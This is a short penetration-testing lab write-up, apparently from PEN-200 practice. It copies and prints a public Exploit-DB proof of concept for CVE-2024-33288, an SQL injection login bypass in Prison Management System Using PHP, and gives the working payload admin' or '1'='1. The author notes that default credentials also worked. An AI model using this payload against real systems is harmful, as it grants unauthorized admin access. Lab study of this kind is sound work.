CVE-2024-33288


The target Prison Management System instance appears to suffer from CVE-2024-33288

Prison Management System Using PHP suffers from a remote SQL injection vulnerability that allows for authentication bypass.

Exploit


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ searchsploit -m php/webapps/52017.txt ; mv 52017.txt CVE-2024-33288.txt
  Exploit: Prison Management System - SQL Injection Authentication Bypass
      URL: https://www.exploit-db.com/exploits/52017
     Path: /usr/share/exploitdb/exploits/php/webapps/52017.txt
    Codes: N/A
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/PEN-200/PG_PRACTICE/vmdak/52017.txt
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ cat CVE-2024-33288.txt 
# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass
# Date: 15/03/2024
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Tested on: Windows ,XAMPP
# CVE : CVE-2024-33288
 
 
# Proof of Concept:
Step 1-Visit http://localhost/prison/
Step 2 - Click on Admin Dashboard button and redirect on login page.
Step 3– Enter username as admin' or '1'='1 and password as 123456
Step 4 Click sing In and now you will be logged in as admin.   

PoC


It works However, I was already able to get to the admin page using the default credential